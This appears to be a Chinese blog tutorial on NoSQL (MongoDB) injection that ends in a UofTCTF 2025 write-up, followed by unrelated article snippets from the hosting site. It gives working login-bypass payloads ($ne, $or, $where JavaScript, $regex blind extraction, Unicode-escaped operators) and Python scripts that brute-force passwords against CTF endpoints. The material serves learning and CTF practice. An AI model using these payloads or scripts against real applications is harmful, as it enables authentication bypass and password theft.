当前位置：首页 > news >正文

NoSQl注入学习

news 来源：原创 2025/8/7 8:42:18

文章目录

什么是NOSQL
相关概念
- 数据库
- 文档
- 集合
MongoDB 基础语法
- - 创建数据库
  - 创建集合
  - 插入文档
  - 更新文档
  - 查询文档
Nosql注入
- PHP 中的 MongoDB 注入
- - 重言式注入
  - 联合查询注入
  - JavaScript 注入
  - 布尔盲注
- Nodejs 中的 MongoDB 注入
从一道题中学习nosql注入

参考：

Nosql 注入从零到一

什么是NOSQL

nosql数据库，简单的说就是非关系型数据库的sql注入，例如MongoDB数据库

MongoDB 将数据存储为一个文档，数据结构由键值（key=>value）对组成。MongoDB 文档类似于 JSON 对象。字段值可以包含其他文档，数组及文档数组。

{"_id" : ObjectId("60fa854cf8aaaf4f21049148"),"name" : "whoami","description" : "the admin user","age" : 19,"status" : "A","groups" : ["admins","users"]
}

RDBMS	MongoDB
数据库	数据库
表格	集合
行	文档
列	字段
表联合	嵌入文档
主键	主键（MongoDB 提供了 key 为 _id）

MongoDB 基础语法

创建数据库

use DATABASE_NAME
如果数据库不存在，则创建数据库，否则切连接并换到指定数据库

创建集合

db.createCollection(name, options)
eg.
db.createCollection("all_users")

name：要创建的集合名称
options：可选参数，指定有关内存大小及索引的选项

插入文档

db.COLLECTION_NAME.insert(document)
eg.
> db.all_users.insert({name: 'whoami', description: 'the admin user',age: 19,status: 'A',groups: ['admins', 'users']
})

更新文档

update() 方法

db.collection.update(<query>,<update>,{upsert: <boolean>,multi: <boolean>,writeConcern: <document>}
)eg.
db.lover.update({'age':'19'}, {$set:{'age':20}}, {multi:true})
过 update() 方法来将年龄 所有为 19的 age 更新到 20

save() 方法

save() 方法通过传入的文档来替换已有文档，_id 主键存在就更新，不存在就插入

db.collection.save(<document>,{writeConcern: <document>}
)eg.替换id为60fa854cf8aaaf4f21049148的文档
> db.all_users.save({"_id" : ObjectId("60fa854cf8aaaf4f21049148"),"name" : "whoami","age" : 21,
})

查询文档

db.collection.find(query, projection)
eg.
db.all_users.find({"age":"20"})

query：可选，使用查询操作符指定查询条件，相当于 sql select 语句中的 where 子句。
projection：可选，使用投影操作符指定返回的键。

如果你需要以易读的方式来读取数据，可以使用 pretty() 方法以格式化的方式来显示所有文档：

操作	格式	范例	RDBMS 中的类似语句
等于	`{<key>:<value>}`	`db.love.find({"name":"whoami"}).pretty()`	`where name = 'whoami'`
小于	`{<key>:{$lt:<value>}}`	`db.love.find({"age":{$lt:19}}).pretty()`	`where age < 19`
小于或等于	`{<key>:{$lte:<value>}}`	`db.love.find({"age":{$lte:19}}).pretty()`	`where likes <= 19`
大于	`{<key>:{$gt:<value>}}`	`db.love.find({"age":{$gt:19}}).pretty()`	`where likes > 19`
大于或等于	`{<key>:{$gte:<value>}}`	`db.love.find({"age":{$gte:19}}).pretty()`	`where likes >= 19`
不等于	`{<key>:{$ne:<value>}}`	`db.love.find({"age":{$ne:19}}).pretty()`	`where likes != 19`

$lte:小于等于（less than and equal）

$gte:大于等于（greater than and equal)

and条件

MongoDB 中的 find() 方法可以传入多个键值对，每个键值对以逗号隔开，即常规 SQL 的 AND 条件。

or条件

 db.col.find({$or: [{key1: value1}, {key2:value2}]}
).pretty()eg.查询键 status 值为 A 或键 age 值为 19 的文档
db.all_users.find({$or:[{"status":"A", "age":"19"}]})eg.where age>19 AND (name='whoami' OR status='A')
db.all_users.find({"age":{$gt:19}, $or: [{"name":"whoami"}, {"status":"A"}]})

Nosql注入

攻击者通过构造恶意的输入，改变查询的逻辑。例如，注入类似 MongoDB 的运算符（如 $n e 、$ or）或嵌套对象。

示例：假设一个登录 API 查询：

db.users.find({ username: req.body.username, password: req.body.password });

如果攻击者提交以下输入：

{  "username": "admin",  "password": { "$ne": null } }

查询会变成：

db.users.find({ username: "admin", password: { $ne: null } });

这将匹配所有 password 不为 null 的用户，绕过密码验证。

PHP 中的 MongoDB 注入

重言式注入

如果对用户输入没有做任何过滤与校验，那么我们可以通过 $ne 关键字构造一个永真的条件就可以完成 NoSQL 注入

username[$ne]=1&password[$ne]=1

URL 查询参数 username[$ne]=1&password[$ne]=1 会被服务器（例如 Express）解析为 JavaScript 对象：

req.query = {  username: { $ne: "1" }, password: { $ne: "1" } 
};

联合查询注入

我们都知道，直接对 SQL 查询语句进行字符拼接串容易造成 SQL 注入，NoSQL 也有类似问题。

string query = "{ username: '" + $username + "', password: '" + $password + "' }"

当用户正确的用户名密码进行登录时，得到的查询语句是应该这样的：

{'username':'admin', 'password':'123456'}

如果此时没有很好地对用户的输入进行过滤或者效验，那攻击者便可以构造如下 payload：

username=admin', $or: [ {}, {'a': 'a&password=' }], $comment: '123456

拼接入查询语句后相当于执行了：

{ username: 'admin', $or: [ {}, {'a':'a', password: '' }], $comment: '123456'}

此时，只要用户名是正确的，这个查询就可以成功。这种手法和 SQL 注入比较相似：

select * from logins where username = 'admin' and (password true<> or ('a'='a' and password = ''))

这样，原本正常的查询语句会被转换为忽略密码的，在无需密码的情况下直接登录用户账号，因为 () 内的条件总是永真的。

但是现在无论是 PHP 的 MongoDB Driver 还是 Nodejs 的 Mongoose 都必须要求查询条件必须是一个数组或者 Query 对象了，因此这用注入方法简单了解一下就好了。

这里解释一下query对象

在 Express 应用中，req.query 是 Express 解析 URL 查询字符串（?key=value&key2=value2）后生成的对象。
例如，URL：

http://example.com/api/posts?id=11&category=tech
- req.query 会被解析为：
```
{  id: "11",  category: "tech" }
```

eg.

http://35.239.207.1:3000/api/posts?OR[0][author][password][startsWith]=A

req.query = {  OR: [    {author: {password: {startsWith: "A"        }      }    }  ] 
};

这里：

OR 是键，其值是一个数组（[{ … }]）。
数组的第一个元素是一个对象，包含嵌套的 author 和 password。

分析：

Query 对象整体是 { OR: […] }，不是 JSON 数组，而是包含数组的对象。
OR[0] 表示数组索引，author 和 password 是嵌套键，startsWith 是查询运算符。

JavaScript 注入

首先我们需要了解一下 $where 操作符。在 MongoDB 中，$where 操作符可以用来执行 JavaScript 代码，将 JavaScript 表达式的字符串或 JavaScript 函数作为查询语句的一部分。在 MongoDB 2.4 之前，通过 $where 操作符使用 map-reduce、group 命令甚至可以访问到 Mongo Shell 中的全局函数和属性，如 db，也就是说可以在自定义的函数里获取数据库的所有信息。

> db.users.find({ $where: "function(){return(this.username == 'whoami')}" })
{ "_id" : ObjectId("60fa9c80257f18542b68c4b9"), "username" : "whoami", "password" : "657260" }
>

由于使用了 $where 关键字，其后面的 JavaScript 将会被执行并返回 “whoami”，然后将查询出 username 为 whoami 的数据。

某些易受攻击的 PHP 应用程序在构建 MongoDB 查询时可能会直接插入未经过处理的用户输入，例如从变量中 $userData 获取查询条件：

db.users.find({ $where: "function(){return(this.username == $userData)}" })

然后，攻击者可能会注入一种恶意的字符串如 'a'; sleep(5000) ，此时 MongoDB 执行的查询语句为：

db.users.find({ $where: "function(){return(this.username == 'a'; sleep(5000))}" })

如果此时服务器有 5 秒钟的延迟则说明注入成功。

MongoDB 2.4 之前

在 MongoDB 2.4 之前，通过 $where 操作符使用 map-reduce、group 命令可以访问到 Mongo Shell 中的全局函数和属性，如 db，也就是说可以通过自定义 JavaScript 函数来获取数据库的所有信息。

如下所示，发送以下数据后，如果有回显的话将获取当前数据库下所有的集合名：

username=1&password=1';(function(){return(tojson(db.getCollectionNames()))})();var a='1

MongoDB 2.4 之后

MongoDB 2.4 之后 db 属性访问不到了，但我们应然可以构造万能密码。如果此时我们发送以下这几种数据：

username=1&password=1';return true//
或
username=1&password=1';return true;var a='1

这是因为发送 payload 进入 PHP 后的数据如下：

array('$where' => "function() { var username = '1';var password = '1';return true;var a='1';if(username == 'admin' && password == '123456'){return true;}else{return false;}}
")

布尔盲注

当页面没有回显时，那么我们可以通过 $regex 正则表达式来进行盲注， $regex 可以达到和传统 SQL 注入中 substr() 函数相同的功能。

布尔盲注重点在于怎么逐个提取字符，如下所示，在已知一个用户名的情况下判断密码的长度：

username=admin&password[$regex]=.{4}    // 登录成功
username=admin&password[$regex]=.{5}    // 登录成功
username=admin&password[$regex]=.{6}    // 登录成功
username=admin&password[$regex]=.{7}    // 登录失败

Nodejs 中的 MongoDB 注入

在处理 MongoDB 查询时，经常会使用 JSON格式将用户提交的数据发送到服务端，如果目标过滤了 $ne 等关键字，我们可以使用 Unicode 编码绕过，因为 JSON 可以直接解析 Unicode。如下所示：

{"username":{"\u0024\u006e\u0065":1},"password": {"\u0024\u006e\u0065":1}}
// {"username":{"$ne":1},"password": {"$ne":1}}

贴一个盲注爆密码的脚本

import requests
import stringpassword = ''
url = 'http://node4.buuoj.cn:27409/login.php'while True:for c in string.printable:if c not in ['*', '+', '.', '?', '|', '#', '&', '$']:# When the method is GETget_payload = '?username=admin&password[$regex]=^%s' % (password + c)# When the method is POSTpost_payload = {"username": "admin","password[$regex]": '^' + password + c}# When the method is POST with JSONjson_payload = """{"username":"admin", "password":{"\\u0024\\u0072\\u0065\\u0067\\u0065\\u0078":"^%s"}}""" % (password + c)headers = {'Content-Type': 'application/json'}r = requests.post(url=url, headers=headers, data=json_payload)    # 简单发送 json#r = requests.post(url=url, data=post_payload)if '但没完全登录' in r.content.decode():print("[+] %s" % (password + c))password += c

从一道题中学习nosql注入

题目参考：UofTCTF-2025-Prismatic Blogs

这道题有意思的地方是它是sqlite数据库，但是js的prsima库会将nosql查询语句自动解析为适配sqlite数据库的sql语句

Prisma 的统一 API：

Prisma 的 where 条件语法与 MongoDB 类似（支持 AND、startsWith 等），即使底层是 SQLite。
攻击者注入的查询（如 startsWith）被 Prisma 转换为 SQLite 的 LIKE，使得攻击行为类似于 NoSQL 注入。

在posts页面可以插入查询语句，且没有任何过滤

app.get("/api/posts",async (req, res) => {try {let query = req.query;query.published = true;let posts = await prisma.post.findMany({where: query});res.json({success: true, posts})} catch (error) {res.json({ success: false, error });}}
);

我们需要做的就是在这里爆出登录密码（用户名都是已知的），接着去login路由登录即可拿到flag

构造一手

AND: [author: {password: {startsWith: abcdefg}},author: {name: {equals: Bob}}
]

转换为url查询参数，AND[0]表示AND的第一个条件

import requests
import json
s='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789'
cha=''
for i in range(25):for c in s:res=requests.get(f"http://localhost:70/api/posts?AND[0][author][name]=Bob&AND[0][author][password][startsWith]={cha+c}")if res.json().get('posts'):cha+=cprint(cha)

这里startsWith是不区分大小写的，所以在爆出密码后再用lt逻辑分出大小写即可，但单一的lt或lte比较不能确定大小写，因为如果前几个字符相等，那么长度短的字符会被认为是更小的。此时就会对我们的if判断产生影响。所以我们采取替换字符避免出现相等误判的现象

我们假设逻辑是

for j in cha:tmp+=chr(ord(j)+1)
AND[1][author][password][lt]={tmp}

假设比较到字符A

构造密码串	真实密码串	逻辑
A<	Ab	相等判定为小于
a<	ab	相等判定为小于
A<	ab	小于
a>	Ab	大于

我们采取双重限制条件，首先把构造字符串全部转为大写便于思考

假设构造字符为A,真实字符为x,再加入一个字符B(A+1)

if A<=x and B>x 说明 x=A

if A<x and B<x 说明x=a

这样就可以确定真实密码到底是小写还是大写了

password=''
tmp=''
for j in cha:tmp=passwordj=j.upper()next=chr(ord(j)+1)res2=requests.get(f"http://localhost:70/api/posts?AND[0][author][name]=Bob&AND[1][author][password][gte]={tmp+j}&AND[2][author][password][lt]={tmp+next}")if res2.json().get('posts'):password+=jelse:password+=j.lower()print(password)

拿到密码后登录即可看到flag 外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传

NoSQl注入学习

文章目录什么是NOSQL相关概念数据库文档集合 MongoDB 基础语法创建数据库创建集合插入文档更新文档查询文档 Nosql注入PHP 中的 MongoDB 注入重言式注入联合查询注入JavaScript 注入布尔盲注 Nodejs 中的 MongoDB 注入从一道题中学习nosql注入参考： Nosql 注入从…...

编程日记 2025/8/7 8:42:18

借助LlamaIndex实现简单Agent

借助LlamaIndex实现简单Agent 1 简介智能体的构建发展是一个趋势，借助LlamaIndex简单实现Agent。本文主要借助LlamaIndex中的FunctionTool和Workflow。Workflow是使用事件流的方法实现。 2 构建公共类由于LlamaIndex中的OpenAI无法直接连接国内大模型&#xf…...

编程日记 2025/8/7 8:40:22

MCGS昆仑通太屏笔记

4.3寸：4013ef/e1 7寸：7032kw 特点： 如果是使用组态屏进行调试使用，选择com1如果是实际项目使用，选择com2 操作步骤： 先创建设备窗口，再创建用户界面在设备窗口界面，依次设置如下…...

编程日记 2025/8/7 8:40:23

纯FPGA控制AD9361的思路和实现之一概述

我们知道PS通过内存映射方式方式用户的IP，具体是将用户的逻辑做成AXI_LITE_SALVE外设，PS做为AXI_LITE_MASTER去控制。在ZYNQ系统中存在PS所以这个架构和思路很流行，ADI出的配置软件无线电子板的DEMO基本都是基于这样的架构。比如下图【上截…...

编程日记 2025/8/3 1:28:00

北斗短报文终端与5G融合：构建空天地海一体化通信新生态

随着北斗三号全球组网完成，短报文通信服务从区域覆盖迈向全球通达，其与5G技术的深度融合，正开创“空天地海一体化”通信新时代。深圳作为全国北斗产业高地，汇聚了遨游通讯等领军企业，其推出的北斗短报文终端通过技术创…...

编程日记 2025/8/7 8:40:23

Meteonorm8-免费使用教程(详细教程-免费)

Meteonorm介绍 Meteonorm 8 是一款专业的气象数据生成软件，广泛应用于太阳能、建筑能效、农业气候研究等领域。它提供全球范围内高精度的气象数据，支持多种数据源和插值方法，帮助用户获取特定地点的长期气象统计信息。 Meteonorm核心功能 …...

编程日记 2025/7/30 11:28:46

nohup的使用

最近远程连接服务器跑程序的时候，总是碰到本地电脑息屏或者ssh断开导致程序中断，往往一觉醒来不是程序跑完了而是因为各种原因本地中断了。为此想到了nohup这个命令，可以让程序在我本地电脑关机后也可以在远端服务器上面运行。命令如下&…...

编程日记 2025/8/3 11:15:33

如何查看HTTP状态码？

目录一、HTTP状态码查看方法 1. 浏览器开发者工具 2. 命令行工具 3. 服务器日志分析二、HTTP状态码分类与核心含义 1. 信息类（1xx） 2. 成功类（2xx） 3. 重定向类&#xff08…...

编程日记 2025/8/6 20:02:29

2025.04.19【Chord diagram】| 弦图绘制技巧大全

Customization Apply customization to the circular chart: color, background, track height and more. Chart types Learn how to use other chart types like line chart, barcharts, vertical ablines and more. 文章目录 CustomizationChart types 什么是弦图&#xff…...

编程日记 2025/8/7 8:40:24

解码 Web Service：从技术原理到应用场景的深度剖析

Web Service 是一种基于网络的、分布式的计算技术，它允许不同的应用程序之间通过网络进行通信和交互。以下是关于 Web Service 的详细介绍： 一、定义与概念 Web Service 是一种可以通过 Web 协议（如 HTTP）进行访问的软件组件&am…...

编程日记 2025/8/7 8:38:40

hackmyvm-airbind

收集信息 arp-scan -l nmap -sS -v 192.168.195.162 访问扫描到的ip，直接跳转到登录页面，利用admin/admin弱口令登录在settings.php中找到一处文件上传，上传一句话木马，上传成功反弹shell 上传php-reverse-shell.php 抓包&am…...

编程日记 2025/8/6 19:45:03

[HCIP] OSPF 综合实验

题目实验需求 1.R5为TSP，其上只能配置IP地址； R5与其他所有直连设备间均使用公有IP；环回地址为100.1.1.1/32 2.R4设备为企业出口路由器 3.整个OSPF环境IP基于172.16.0.0/16划分； 4.所有设备均可访问R5的环回； 5…...

编程日记 2025/8/6 16:13:24

arkTs：使用setTimeout / setInterval 实现透明度切换的轮播图

使用setTimeout / setInterval 实现透明度切换的轮播图 1 主要内容说明1.1 setTimeout1.2 setInterval1.3 表格 2 举例说明2.1 图片变化的内容说明2.2 源码相关内容说明2.3 源码A2.4源码A的运行效果展示2.4.1 效果截图2.4.2 效果视频 3.结语4.定位日期 1 主要内容说明 1.1 set…...

编程日记 2025/8/7 8:39:52

苍穹外卖项目中所涉及到的测试内容

1.使用JWT令牌封装用户令牌，并且设置相应的拦截器校验JWT的有效性，从而确保了项目的安全可靠 1.基本功能测试： 验证合法JWT是否能够正常通过拦截器的校验验证非法的JWT能否正常通过拦截器的校验 2.可靠性测试： 3.易用性测试 …...

编程日记 2025/8/7 8:34:35

案例驱动的 IT 团队管理：创新与突破之路：第五章创新管理：从机制设计到文化养成-5.2 技术决策民主化-5.2.3草根创新的孵化土壤构建

👉 点击关注不迷路 👉 点击关注不迷路 👉 点击关注不迷路文章大纲草根创新的孵化土壤构建：IT团队技术决策民主化的底层实践1. 背景与挑战：传统技术决策体系的失效1.1 行业现状与痛点1.2 草根创新的价值潜力 2. 机制设…...

编程日记 2025/8/7 8:39:53

探秘Python 工匠：案例、技巧与工程实践：解锁Python进阶的通关秘籍

重要的放前面 Python 工匠：案例、技巧与工程实践探秘Python 工匠：案例、技巧与工程实践：解锁Python进阶的通关秘籍在Python的编程世界中，从入门小白到技术大牛的进阶之路往往充满挑战。Python工匠：案例、技巧与工…...

编程日记 2025/8/7 8:38:40

【langchain4j】Springboot如何接入大模型以及实战开发-AI问答助手（一）

langchain4j介绍官网地址：https://docs.langchain4j.dev/get-started langchain4j可以说是java和spring的关系，spring让我们开发java应用非常简单，那么langchain4j对应的就是java开发ai的 “Spring” 他集成了AI应用的多种场景&#xff0c…...

编程日记 2025/8/7 8:39:53

解决Windows update服务启动拒绝访问的问题 | wuauserv 注册表拒绝访问的方法

在某些情况下，为了配置系统更新相关服务（例如禁用 Windows 自动更新），我们需要更改注册表中 wuauserv 项的权限。本教程将带你一步步操作，成功获取并修改权限。修改注册表路径： HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv 步骤一：打开注册表编辑…...

编程日记 2025/8/3 18:55:33

精益数据分析（5/126）：解锁创业成功的关键密码

精益数据分析（5/126）：解锁创业成功的关键密码大家好！我一直坚信在技术与商业不断融合的当下，持续学习是保持进步的唯一途径。之前我们一起探讨了《精益数据分析》的部分内容，今天咱们接着深入学习&#x…...

编程日记 2025/8/5 19:14:33

Cribl 优化EC2 ip-host-region 数据

We’ve seen examples of using the magical powers of regex to customize Functions, extract fields, and filter events in real time. In this section, we’ll show you how to sprinkle your Lookups with regex magic. Lets walk through a Pipeline that demonstrates…...

编程日记 2025/7/30 4:12:17